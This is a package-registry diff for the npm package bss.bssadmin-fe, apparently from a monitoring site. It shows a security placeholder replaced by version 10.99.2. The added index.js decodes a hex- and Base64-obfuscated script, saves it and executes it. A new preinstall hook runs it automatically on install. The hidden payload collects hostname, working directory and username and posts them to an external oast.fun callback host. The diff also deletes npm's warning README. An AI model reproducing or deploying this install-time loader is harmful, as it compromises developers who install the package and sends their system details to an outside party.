bss.bssadmin-fe 0.0.1-security → 10.99.2

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of bss.bssadmin-fe might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +41 -0
  2. package/package.json +13 -4
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,41 @@
1
+ const { exec } = require('child_process');
2
+ const fs = require('fs');
3
+ const path = require('path');
4
+
5
+ // The encoded script (hexadecimal-encoded Base64 string)
6
+ const hexEncodedBase64 = '59323975633351676579426C6547566A49483067505342795A58463161584A6C4B434A6A61476C735A463977636D396A5A584E7A49696B37436D4E76626E4E30494768306448427A49443067636D567864576C795A53676E6148523063484D6E4B54734B43693876494556345A574E31644755676332686C6247776759323974625746755A484D67644738675A32563049484E356333526C62534270626D5A76636D316864476C766267706C6547566A4B43646F62334E30626D46745A53416D4A694277643251674A69596764326876595731704A7977674B475679636D39794C43427A644752766458517349484E305A47567963696B675054346765776F6749434167615759674B475679636D39794B53423743694167494341674943416759323975633239735A53356C636E4A76636967695258686C593356306157397549475679636D39794F69497349475679636D39794C6D316C63334E685A3255704F776F67494341674943416749484A6C64485679626A734B494341674948304B4943416749416F67494341674C79386752586830636D466A6443427A65584E305A5730676157356D62334A74595852706232344B4943416749474E76626E4E304946746F62334E30626D46745A5377675933646B4C4342336147396862576C64494430676333526B623356304C6E52796157306F4B53357A634778706443676E5847346E4B54734B43694167494341764C794251636D567759584A6C49475268644745675A6D39794946425055315167636D56786457567A64416F674943416759323975633351675A474630595341394945705454303475633352796157356E61575A354B48734B49434167494341674943426F62334E30626D46745A53774B49434167494341674943426B61584A6C59335276636E6B3649474E335A43774B494341674943416749434231633256794F6942336147396862576B4B49434167494830704F776F4B49434167494338764945526C5A6D6C755A534276634852706232357A49475A7663694230614755675346525555464D67636D56786457567A64416F674943416759323975633351676233423061573975637941394948734B49434167494341674943426F62334E30626D46745A546F674A334A68636E526D646E687261586C725A3370746248646F63574E714D32687262575631656D55316244526A6179357659584E304C6D5A31626963734369416749434167494341676347397964446F674E44517A4C416F6749434167494341674948426864476736494363764A79774B4943416749434167494342745A58526F623251364943645154314E554A79774B49434167494341674943426F5A57466B5A584A7A4F6942374369416749434167494341674943416749436444623235305A5735304C5652356347556E4F69416E5958427762476C6A5958527062323476616E4E76626963734369416749434167494341674943416749436444623235305A5735304C55786C626D6430614363364947526864474575624756755A33526F43694167494341674943416766516F67494341676654734B43694167494341764C7942545A57356B4948526F5A53424956465251557942795A5846315A584E30436941674943426A6232357A644342795A5845675053426F64485277637935795A5846315A584E304B47397764476C76626E4D73494368795A584D704944302B4948734B4943416749434167494342735A585167636D567A63473975633255675053416E4A7A734B4943416749434167494342795A584D756232346F4A3252686447456E4C43416F59326831626D73704944302B4948734B49434167494341674943416749434167636D567A63473975633255674B7A306759326831626D733743694167494341674943416766536B3743676F67494341674943416749484A6C637935766269676E5A57356B4A7977674B436B675054346765776F674943416749434167494341674943426A6232357A6232786C4C6D78765A79676E556D567A63473975633255364A797767636D567A63473975633255704F776F674943416749434167494830704F776F674943416766536B3743676F6749434167636D56784C6D39754B43646C636E4A76636963734943686C4B5341395069423743694167494341674943416759323975633239735A53356C636E4A766369686755484A76596D786C625342336158526F49484A6C6358566C63335136494352375A5335745A584E7A5957646C665741704F776F674943416766536B3743676F6749434167636D56784C6E64796158526C4B475268644745704F776F6749434167636D56784C6D56755A4367704F7770394B54734B';
7
+
8
+ // Decode the hex string to Base64
9
+ let base64Script;
10
+ try {
11
+ base64Script = Buffer.from(hexEncodedBase64, 'hex').toString('utf-8');
12
+ } catch (err) {
13
+ console.error("Error decoding hex to Base64:", err);
14
+ process.exit(1);
15
+ }
16
+
17
+ // Decode the Base64 string to the original script
18
+ let script;
19
+ try {
20
+ script = Buffer.from(base64Script, 'base64').toString('utf-8');
21
+ } catch (err) {
22
+ console.error("Error decoding Base64 to script:", err);
23
+ process.exit(1);
24
+ }
25
+
26
+ // Define the path where the decoded script will be saved
27
+ const scriptPath = path.join(__dirname, 'main.js');
28
+
29
+ // Save the decoded script to a file
30
+ fs.writeFileSync(scriptPath, script, 'utf-8');
31
+ console.log(`Decoded script saved to ${scriptPath}`);
32
+
33
+ // Execute the decoded script
34
+ exec(`node ${scriptPath}`, (error, stdout, stderr) => {
35
+ if (error) {
36
+ console.error("Execution error:", error.message);
37
+ return;
38
+ }
39
+ console.log("Output:", stdout);
40
+ console.error("Stderr:", stderr);
41
+ });
package/package.json CHANGED
@@ -1,6 +1,15 @@
1
1
  {
2
- "name": "bss.bssadmin-fe",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
2
+ "name": "bss.bssadmin-fe",
3
+ "version": "10.99.2",
4
+ "description": "POC",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "keywords": [
11
+ "rce"
12
+ ],
13
+ "author": "naeem",
14
+ "license": "ISC"
6
15
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=bss.bssadmin-fe for more information.